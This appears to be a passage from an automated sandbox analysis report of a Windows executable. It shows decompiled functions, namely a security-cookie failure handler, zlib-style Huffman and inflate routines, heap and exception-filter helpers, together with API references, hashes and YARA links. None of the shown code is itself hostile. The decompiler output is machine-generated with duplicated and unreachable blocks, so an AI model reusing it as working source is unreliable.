Uniqueness Score: -1.00%

Non-executed Functions

Function 0040CE09, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x11f9a93f
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x11f9a93f
				_v812 = _t12;
				_t13 =  *0x422238; // 0xee0656c0
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce09
0x0040ce0f
0x0040ce11
0x0040ce11
0x00413644
0x00413649
0x0041364f
0x00413655
0x0041365b
0x00413661
0x00413667
0x0041366e
0x00413675
0x0041367c
0x00413683
0x0041368a
0x00413691
0x00413692
0x0041369b
0x004136a3
0x004136ab
0x004136b6
0x004136c0
0x004136c5
0x004136ca
0x004136d4
0x004136de
0x004136e3
0x004136e9
0x004136ee
0x004136fa
0x004136ff
0x00413701
0x00413709
0x00413714
0x00413721
0x00413723
0x00413725
0x0041372a
0x0041373e

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00408C60, Relevance: 4.1, Strings: 3, Instructions: 377
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00408C60(signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16, signed int* _a20, signed short* _a24) {
				short _v30;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				signed int _v100;
				signed short* _v104;
				intOrPtr _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed short _v122;
				signed int _v123;
				char _v124;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				void* _t216;
				signed int _t217;
				signed int _t219;
				intOrPtr _t220;
				signed int _t223;
				signed short _t225;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				signed int _t240;
				signed int _t248;
				signed int _t251;
				void* _t254;
				signed int _t260;
				intOrPtr* _t261;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				short _t270;
				intOrPtr* _t281;
				signed char _t285;
				signed int _t297;
				signed int _t299;
				intOrPtr _t305;
				signed int _t308;
				signed int _t309;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t327;
				signed int _t333;
				signed int _t336;
				char _t337;
				intOrPtr* _t340;
				signed int* _t343;
				signed int _t344;
				signed short* _t345;
				signed int _t348;
				intOrPtr* _t349;
				signed short* _t350;
				intOrPtr _t351;
				intOrPtr _t352;
				signed int _t353;
				void* _t354;

				_t354 =  &_v124;
				_t308 = _a12;
				_t352 = _a8;
				_v64 = 0xbadbad;
				_v60 = 0 << 0x10;
				_v56 = 0 << 0x10;
				_v52 = 0 << 0x10;
				_v48 = 0 << 0x10;
				_v44 = 0 << 0x10;
				_v40 = 0 << 0x10;
				_v36 = 0 << 0x10;
				_t211 = 0;
				if(_t308 > 0) {
					do {
						 *((short*)(_t354 + 0x48 + ( *(_t352 + _t211 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t354 + 0x48 + ( *(_t352 + _t211 * 2) & 0x0000ffff) * 2)) + 1;
						_t211 = _t211 + 1;
					} while (_t211 < _t308);
				}
				_t343 = _a20;
				_t212 =  *_t343;
				_v120 = _t212;
				_t263 = 0xf;
				while( *((short*)(_t354 + 0x48 + _t263 * 2)) == 0) {
					_t263 = _t263 - 1;
					if(_t263 >= 1) {
						continue;
					}
					break;
				}
				_v112 = _t263;
				if(_t212 > _t263) {
					_v120 = _t263;
				}
				if(_t263 != 0) {
					_t344 = 1;
					while(1) {
						__eflags =  *((short*)(_t354 + 0x48 + _t344 * 2));
						if( *((short*)(_t354 + 0x48 + _t344 * 2)) != 0) {
							break;
						}
						__eflags =  *((short*)(_t354 + 0x4a + _t344 * 2));
						if( *((short*)(_t354 + 0x4a + _t344 * 2)) != 0) {
							_t344 = _t344 + 1;
						} else {
							__eflags =  *((short*)(_t354 + 0x4c + _t344 * 2));
							if( *((short*)(_t354 + 0x4c + _t344 * 2)) != 0) {
								_t344 = _t344 + 2;
							} else {
								__eflags =  *((short*)(_t354 + 0x4e + _t344 * 2));
								if( *((short*)(_t354 + 0x4e + _t344 * 2)) != 0) {
									_t344 = _t344 + 3;
								} else {
									__eflags =  *((short*)(_t354 + 0x50 + _t344 * 2));
									if( *((short*)(_t354 + 0x50 + _t344 * 2)) != 0) {
										_t344 = _t344 + 4;
										__eflags = _t344;
									} else {
										_t344 = _t344 + 5;
										__eflags = _t344 - 0xf;
										if(_t344 <= 0xf) {
											continue;
										} else {
										}
									}
								}
							}
						}
						break;
					}
					__eflags = _v120 - _t344;
					if(_v120 < _t344) {
						_v120 = _t344;
					}
					_t309 = 1;
					_t213 = 1;
					while(1) {
						_t309 = _t309 + _t309 - ( *(_t354 + 0x48 + _t213 * 2) & 0x0000ffff);
						__eflags = _t309;
						if(_t309 < 0) {
							break;
						}
						_t213 = _t213 + 1;
						__eflags = _t213 - 0xf;
						if(_t213 <= 0xf) {
							continue;
						} else {
							_t333 = _a4;
							__eflags = _t309;
							if(_t309 <= 0) {
								L32:
								_v30 = 0;
								_t216 = 2;
								do {
									_t270 =  *((intOrPtr*)(_t354 + _t216 + 0x6c)) +  *((intOrPtr*)(_t354 + _t216 + 0x4c));
									_t216 = _t216 + 2;
									 *((short*)(_t354 + _t216 + 0x6c)) = _t270;
									__eflags = _t216 - 0x1e;
								} while (_t216 < 0x1e);
								_t264 = _a12;
								_t217 = 0;
								__eflags = _t264;
								if(_t264 > 0) {
									do {
										__eflags =  *(_t352 + _t217 * 2);
										if( *(_t352 + _t217 * 2) != 0) {
											 *(_a24 + ( *(_t354 + 0x6c + ( *(_t352 + _t217 * 2) & 0x0000ffff) * 2) & 0x0000ffff) * 2) = _t217;
											_t327 =  *(_t352 + _t217 * 2) & 0x0000ffff;
											_t75 = _t354 + 0x6c + _t327 * 2;
											 *_t75 =  *(_t354 + 0x6c + _t327 * 2) + 1;
											__eflags =  *_t75;
										}
										_t217 = _t217 + 1;
										__eflags = _t217 - _t264;
									} while (_t217 < _t264);
								}
								_t219 = _t333;
								__eflags = _t219;
								if(_t219 == 0) {
									_t220 = _a24;
									_v88 = _t220;
									_v96 = 0x13;
									goto L43;
								} else {
									__eflags = _t219 == 1;
									if(_t219 == 1) {
										_v88 = 0x41e28e;
										_t220 = 0x41e2ce;
										_v96 = 0x100;
										L43:
										_v92 = _t220;
									} else {
										_v88 = 0x41e510;
										_v92 = 0x41e550;
										_v96 = 0xffffffff;
									}
								}
								_v108 =  *_a16;
								_t223 = 1 << _v120;
								_v84 = 0xffffffff;
								_t353 = 0;
								_t265 = 0;
								_t97 = _t223 - 1; // 0x0
								_v116 = _t344;
								_v80 = 1;
								_v100 = 1;
								_v76 = _t97;
								__eflags = _t333 - 1;
								if(_t333 != 1) {
									L46:
									_v104 = _a24;
									while(1) {
										L47:
										_t345 = _v104;
										_t225 =  *_t345 & 0x0000ffff;
										_v123 = _v116 - _t265;
										__eflags = (_t225 & 0x0000ffff) - _v96;
										if(__eflags >= 0) {
											if(__eflags <= 0) {
												__eflags = 0;
												_v124 = 0x60;
												_v122 = 0;
											} else {
												_t254 = ( *_t345 & 0x0000ffff) + ( *_t345 & 0x0000ffff);
												_v124 =  *((intOrPtr*)(_t254 + _v92));
												_v122 =  *((intOrPtr*)(_t254 + _v88));
											}
										} else {
											_v124 = 0;
											_v122 = _t225;
										}
										_t226 = _v80;
										_v72 = _t226;
										_t336 = (_t353 >> _t265) + _t226;
										__eflags = _t336;
										_t281 = _v108 + _t336 * 4;
										_t337 = _v124;
										do {
											L53:
											_t226 = _t226 - 1;
											_t281 = _t281 - 4;
											 *_t281 = _t337;
											__eflags = _t226;
										} while (_t226 != 0);
										_t316 = _v116;
										_t228 = 1 << _t316 - 1;
										__eflags = _t353 & 0x00000001;
										if((_t353 & 0x00000001) != 0) {
											do {
												_t228 = _t228 >> 1;
												__eflags = _t353 & _t228;
											} while ((_t353 & _t228) != 0);
										}
										__eflags = _t228;
										if(_t228 == 0) {
											_t353 = 0;
											__eflags = 0;
										} else {
											_t132 = _t228 - 1; // 0x0
											_t353 = (_t132 & _t353) + _t228;
										}
										_v104 =  &(_v104[1]);
										 *(_t354 + 0x4c + _t316 * 2) =  *(_t354 + 0x4c + _t316 * 2) + 0xffff;
										__eflags =  *(_t354 + 0x4c + _t316 * 2) & 0x0000ffff;
										if(( *(_t354 + 0x4c + _t316 * 2) & 0x0000ffff) != 0) {
											L62:
											__eflags = _t316 - _v120;
											if(_t316 <= _v120) {
												L47:
												_t345 = _v104;
												_t225 =  *_t345 & 0x0000ffff;
												_v123 = _v116 - _t265;
												__eflags = (_t225 & 0x0000ffff) - _v96;
												if(__eflags >= 0) {
													if(__eflags <= 0) {
														__eflags = 0;
														_v124 = 0x60;
														_v122 = 0;
													} else {
														_t254 = ( *_t345 & 0x0000ffff) + ( *_t345 & 0x0000ffff);
														_v124 =  *((intOrPtr*)(_t254 + _v92));
														_v122 =  *((intOrPtr*)(_t254 + _v88));
													}
												} else {
													_v124 = 0;
													_v122 = _t225;
												}
												_t226 = _v80;
												_v72 = _t226;
												_t336 = (_t353 >> _t265) + _t226;
												__eflags = _t336;
												_t281 = _v108 + _t336 * 4;
												_t337 = _v124;
												goto L53;
											} else {
												L63:
												_t348 = _v76 & _t353;
												_v68 = _t348;
												__eflags = _t348 - _v84;
												if(_t348 == _v84) {
													continue;
												} else {
													L64:
													__eflags = _t265;
													if(_t265 == 0) {
														_t265 = _v120;
													}
													_v108 = _v108 + _v72 * 4;
													_t285 = _v116 - _t265;
													_t318 = _t265 + _t285;
													_t233 = 1 << _t285;
													__eflags = _t318 - _v112;
													if(_t318 < _v112) {
														_t350 = _t354 + 0x4c + _t318 * 2;
														while(1) {
															_t240 = _t233 - ( *_t350 & 0x0000ffff);
															__eflags = _t240;
															if(_t240 <= 0) {
																break;
															}
															_t318 = _t318 + 1;
															_t285 = _t285 + 1;
															_t350 =  &(_t350[1]);
															_t233 = _t240 + _t240;
															__eflags = _t318 - _v112;
															if(_t318 < _v112) {
																continue;
															}
															break;
														}
														_t348 = _v68;
													}
													_v100 = _v100 + 1;
													__eflags = _a4 - 1;
													_v80 = 1 << _t285;
													if(_a4 != 1) {
														L73:
														_t319 = _t348;
														_t349 = _a16;
														 *( *_t349 + _t319 * 4) = _t285;
														 *((char*)( *_t349 + 1 + _t319 * 4)) = _v120;
														_v84 = _t319;
														 *((short*)( *_t349 + 2 + _t319 * 4)) = _v108 -  *_t349 >> 2;
														continue;
														do {
															do {
																goto L47;
															} while (_t316 <= _v120);
															goto L63;
														} while (_t348 == _v84);
														goto L64;
													} else {
														__eflags = _v100 - 0x5b0;
														if(_v100 >= 0x5b0) {
															goto L84;
														} else {
															goto L73;
														}
													}
												}
											}
										} else {
											__eflags = _t316 - _v112;
											if(_t316 == _v112) {
												_t340 = _a16;
												_v124 = 0x40;
												_v123 = _t316 - _t265;
												_v122 = 0;
												__eflags = _t353;
												if(_t353 != 0) {
													_t351 = _v108;
													do {
														__eflags = _t265;
														if(_t265 != 0) {
															__eflags = (_v76 & _t353) - _v84;
															if((_v76 & _t353) != _v84) {
																_t251 = _v120;
																_t351 =  *_t340;
																_t265 = 0;
																__eflags = 0;
																_v116 = _t251;
																_v123 = _t251;
																_t316 = _t251;
															}
														}
														 *((intOrPtr*)(_t351 + (_t353 >> _t265) * 4)) = _v124;
														_t248 = 1 << _t316 - 1;
														__eflags = _t353 & 0x00000001;
														if((_t353 & 0x00000001) != 0) {
															do {
																_t248 = _t248 >> 1;
																__eflags = _t353 & _t248;
															} while ((_t353 & _t248) != 0);
														}
														__eflags = _t248;
														if(_t248 != 0) {
															goto L82;
														}
														goto L83;
														L82:
														_t203 = _t248 - 1; // 0x0
														_t297 = (_t203 & _t353) + _t248;
														__eflags = _t297;
														_t353 = _t297;
													} while (_t297 != 0);
												}
												L83:
												 *_t340 =  *_t340 + _v100 * 4;
												 *_a20 = _v120;
												__eflags = 0;
												return 0;
											} else {
												_t299 =  *(_a8 + ( *_v104 & 0x0000ffff) * 2) & 0x0000ffff;
												_v116 = _t299;
												_t316 = _t299;
												goto L62;
											}
										}
										goto L85;
									}
								} else {
									__eflags = _t223 - 0x5b0;
									if(_t223 >= 0x5b0) {
										L84:
										return 1;
									} else {
										goto L46;
									}
								}
							} else {
								__eflags = _t333;
								if(_t333 == 0) {
									L30:
									_t260 = _t213 | 0xffffffff;
									__eflags = _t260;
									return _t260;
								} else {
									__eflags = _t263 - 1;
									if(_t263 == 1) {
										goto L32;
									} else {
										goto L30;
									}
								}
							}
						}
						goto L85;
					}
					_t214 = _t213 | 0xffffffff;
					__eflags = _t214;
					return _t214;
				} else {
					_t261 = _a16;
					_v122 = 0;
					_v124 = 0x40;
					_v123 = 1;
					_t305 = _v124;
					 *((intOrPtr*)( *_t261)) = _t305;
					 *_t261 =  *_t261 + 4;
					 *((intOrPtr*)( *_t261)) = _t305;
					 *_t261 =  *_t261 + 4;
					 *_t343 = 1;
					return 0;
				}
				L85:
			}

0x00408c60
0x00408c63
0x00408c78
0x00408c7f
0x00408c83
0x00408c87
0x00408c8b
0x00408c8f
0x00408c93
0x00408c97
0x00408c9b
0x00408c9f
0x00408ca4
0x00408cb0
0x00408cb5
0x00408cbe
0x00408cbf
0x00408cb0
0x00408cc3
0x00408cca
0x00408ccc
0x00408cd0
0x00408cd5
0x00408cdd
0x00408ce1
0x00000000
0x00000000
0x00000000
0x00408ce1
0x00408ce3
0x00408ce9
0x00408ceb
0x00408ceb
0x00408cf1
0x00408d2c
0x00408d31
0x00408d31
0x00408d37
0x00000000
0x00000000
0x00408d39
0x00408d3f
0x00408d63
0x00408d41
0x00408d41
0x00408d47
0x00408d66
0x00408d49
0x00408d49
0x00408d4f
0x00408d6b
0x00408d51
0x00408d51
0x00408d57
0x00408d70
0x00408d70
0x00408d59
0x00408d59
0x00408d5c
0x00408d5f
0x00000000
0x00000000
0x00408d61
0x00408d5f
0x00408d57
0x00408d4f
0x00408d47
0x00000000
0x00408d3f
0x00408d73
0x00408d77
0x00408d79
0x00408d79
0x00408d7d
0x00408d82
0x00408d84
0x00408d8b
0x00408d8b
0x00408d8d
0x00000000
0x00000000
0x00408d8f
0x00408d90
0x00408d93
0x00000000
0x00408d95
0x00408d96
0x00408d9d
0x00408d9f
0x00408dbf
0x00408dc1
0x00408dc6
0x00408dd0
0x00408dd5
0x00408dda
0x00408ddd
0x00408de2
0x00408de2
0x00408de7
0x00408dee
0x00408df0
0x00408df2
0x00408df4
0x00408df4
0x00408dfa
0x00408e0d
0x00408e11
0x00408e16
0x00408e16
0x00408e16
0x00408e1b
0x00408e1f
0x00408e20
0x00408e20
0x00408df4
0x00408e26
0x00408e26
0x00408e2e
0x00408e6d
0x00408e74
0x00408e78
0x00000000
0x00408e30
0x00408e30
0x00408e33
0x00408e55
0x00408e5e
0x00408e63
0x00408e80
0x00408e80
0x00408e35
0x00408e35
0x00408e3d
0x00408e45
0x00408e45
0x00408e33
0x00408e8d
0x00408e9a
0x00408e9c
0x00408ea0
0x00408ea2
0x00408ea4
0x00408ea7
0x00408eab
0x00408eaf
0x00408eb3
0x00408eb7
0x00408eba
0x00408ec7
0x00408ece
0x00408ed2
0x00408ed2
0x00408ed6
0x00408eda
0x00408ee3
0x00408eea
0x00408eec
0x00408efa
0x00408f1b
0x00408f1d
0x00408f22
0x00408efc
0x00408f03
0x00408f10
0x00408f14
0x00408f14
0x00408eee
0x00408eee
0x00408ef3
0x00408ef3
0x00408f2b
0x00408f42
0x00408f4d
0x00408f4d
0x00408f4f
0x00408f52
0x00408f56
0x00408f56
0x00408f56
0x00408f58
0x00408f5a
0x00408f5c
0x00408f5c
0x00408f60
0x00408f6c
0x00408f6e
0x00408f70
0x00408f72
0x00408f72
0x00408f74
0x00408f74
0x00408f72
0x00408f78
0x00408f7a
0x00408f87
0x00408f87
0x00408f7c
0x00408f7c
0x00408f83
0x00408f83
0x00408f89
0x00408f93
0x00408f9d
0x00408fa0
0x00408fc4
0x00408fc4
0x00408fc8
0x00408ed2
0x00408ed6
0x00408eda
0x00408ee3
0x00408eea
0x00408eec
0x00408efa
0x00408f1b
0x00408f1d
0x00408f22
0x00408efc
0x00408f03
0x00408f10
0x00408f14
0x00408f14
0x00408eee
0x00408eee
0x00408ef3
0x00408ef3
0x00408f2b
0x00408f42
0x00408f4d
0x00408f4d
0x00408f4f
0x00408f52
0x00000000
0x00408fce
0x00408fce
0x00408fd2
0x00408fd4
0x00408fd8
0x00408fdc
0x00000000
0x00408fe2
0x00408fe2
0x00408fe2
0x00408fe4
0x00408fe6
0x00408fe6
0x00408ff5
0x00408ffd
0x00409004
0x00409007
0x00409009
0x0040900d
0x0040900f
0x00409013
0x00409016
0x00409018
0x0040901a
0x00000000
0x00000000
0x0040901c
0x0040901d
0x0040901e
0x00409021
0x00409023
0x00409027
0x00000000
0x00000000
0x00000000
0x00409027
0x00409029
0x00409029
0x00409034
0x00409038
0x00409040
0x00409044
0x00409054
0x00409054
0x00409056
0x0040905f
0x00409068
0x00409077
0x0040907b
0x00409080
0x00408ed2
0x00408ed2
0x00000000
0x00000000
0x00000000
0x00408ed2
0x00000000
0x00409046
0x00409046
0x0040904e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040904e
0x00409044
0x00408fdc
0x00408fa2
0x00408fa2
0x00408fa6
0x00409085
0x00409092
0x00409097
0x0040909b
0x004090a0
0x004090a2
0x004090a4
0x004090a8
0x004090a8
0x004090aa
0x004090b2
0x004090b6
0x004090b8
0x004090bc
0x004090be
0x004090be
0x004090c0
0x004090c4
0x004090c8
0x004090c8
0x004090b6
0x004090d4
0x004090df
0x004090e1
0x004090e3
0x004090e5
0x004090e5
0x004090e7
0x004090e7
0x004090e5
0x004090eb
0x004090ed
0x00000000
0x00000000
0x00000000
0x004090ef
0x004090ef
0x004090f4
0x004090f4
0x004090f6
0x004090f6
0x004090a8
0x004090fa
0x0040910c
0x00409115
0x00409117
0x0040911d
0x00408fac
0x00408fba
0x00408fbe
0x00408fc2
0x00000000
0x00408fc2
0x00408fa6
0x00000000
0x00408fa0
0x00408ebc
0x00408ebc
0x00408ec1
0x0040911e
0x0040912a
0x00000000
0x00000000
0x00000000
0x00408ec1
0x00408da1
0x00408da1
0x00408da3
0x00408daa
0x00408dad
0x00408dad
0x00408db4
0x00408da5
0x00408da5
0x00408da8
0x00000000
0x00000000
0x00000000
0x00000000
0x00408da8
0x00408da3
0x00408d9f
0x00000000
0x00408d93
0x00408db7
0x00408db7
0x00408dbe
0x00408cf3
0x00408cf3
0x00408cfc
0x00408d03
0x00408d08
0x00408d0d
0x00408d11
0x00408d13
0x00408d18
0x00408d1a
0x00408d1d
0x00408d2b
0x00408d2b
0x00000000

Strings

@, xrefs: 00409092
@, xrefs: 00408D03
PA, xrefs: 00408E3D

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID: @$@$PA
API String ID: 0-3039612711
Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB0, Relevance: 2.5, APIs: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}

0x0040adb3
0x0040adb5
0x0040adb8
0x0040adc0
0x0040adc8
0x0040adc8
0x0040adce
0x0040add0
0x0040add8
0x00000000
0x0040ade1
0x0040add8
0x0040ade8

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004123F1, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004123F1() {

				SetUnhandledExceptionFilter(E004123AF);
				return 0;
			}

0x004123f6
0x004123fe

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Uniqueness

Uniqueness Score: -1.00%

Function 00407C3F, Relevance: .8, Instructions: 783
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00407C3F(unsigned int __ebx, signed char* __edx, signed int* __edi, signed int __esi) {
				signed int _t623;
				signed int _t626;
				signed char** _t637;
				signed int _t645;
				signed int _t649;
				signed int _t654;
				signed int _t657;
				signed int _t660;
				signed int _t662;
				signed int _t665;
				signed char _t771;
				signed char _t776;
				signed char _t778;
				signed int _t783;
				signed int _t785;
				signed int _t792;
				signed int _t795;
				signed int _t799;
				signed int _t803;
				signed int _t805;
				signed int _t813;
				unsigned int _t814;
				signed int _t815;
				signed int _t816;
				void* _t824;
				unsigned int _t828;
				unsigned int _t829;
				intOrPtr _t961;
				signed char _t962;
				signed char _t968;
				signed char _t974;
				signed char* _t989;
				signed char* _t998;
				signed int* _t1018;
				signed int _t1023;
				signed char** _t1025;
				signed char* _t1029;
				void* _t1032;
				void* _t1036;

				L0:
				while(1) {
					L0:
					_t1023 = __esi;
					_t1018 = __edi;
					_t989 = __edx;
					_t814 = __ebx;
					if(__esi >= 0xe) {
						goto L154;
					}
					L152:
					while(__edx != 0) {
						__eax =  *__ebp & 0x000000ff;
						__eax = ( *__ebp & 0x000000ff) << __cl;
						__edx = __edx - 1;
						__esi = __esi + 8;
						__ebp =  &(__ebp[1]);
						__ebx = __ebx + __eax;
						 *(__esp + 0x10) = __edx;
						if(__esi < 0xe) {
							continue;
						} else {
							goto L154;
						}
						L321:
					}
					L303:
					_t637 =  *(_t1036 + 0x40);
					_t637[3] =  *(_t1036 + 0x24);
					_t637[4] =  *(_t1036 + 0x18);
					 *_t637 = _t1029;
					_t637[1] = _t998;
					_t1018[0xe] = _t814;
					_t1018[0xf] = _t1023;
					if(_t1018[0xa] != 0 ||  *_t1018 < 0x18 &&  *(_t1036 + 0x28) != _t637[4]) {
						L306:
						if(E004072B0( *(_t1036 + 0x28),  *(_t1036 + 0x40)) == 0) {
							goto L309;
						} else {
							L307:
							 *_t1018 = 0x1c;
							L308:
							return 0xfffffffc;
						}
					} else {
						L309:
						_t1025 =  *(_t1036 + 0x40);
						_t1032 =  *((intOrPtr*)(_t1036 + 0x38)) - _t1025[1];
						_t824 =  *(_t1036 + 0x28) - _t1025[4];
						_t1025[2] =  &(_t1025[2][_t1032]);
						_t1025[5] =  &(_t1025[5][_t824]);
						_t1018[7] = _t1018[7] + _t824;
						if(_t1018[2] != 0 && _t824 != 0) {
							_push(_t824);
							if(_t1018[4] == 0) {
								_push(_t1025[3] - _t824);
								_push(_t1018[6]);
								_t649 = E004024A0();
							} else {
								_push(_t1025[3] - _t824);
								_push(_t1018[6]);
								_t649 = E00403080();
							}
							_t1018[6] = _t649;
							_t1036 = _t1036 + 0xc;
							_t1025[0xc] = _t649;
						}
						asm("sbb edx, edx");
						_t1025[0xb] = ( ~(_t1018[1]) & 0x00000040) + ((0 |  *_t1018 != 0x0000000b) - 0x00000001 & 0x00000080) + _t1018[0xf];
						if(_t1032 != 0 || _t824 != 0) {
							L317:
							if( *((intOrPtr*)(_t1036 + 0x44)) != 4) {
								L320:
								return  *(_t1036 + 0x30);
							} else {
								goto L318;
							}
						} else {
							L318:
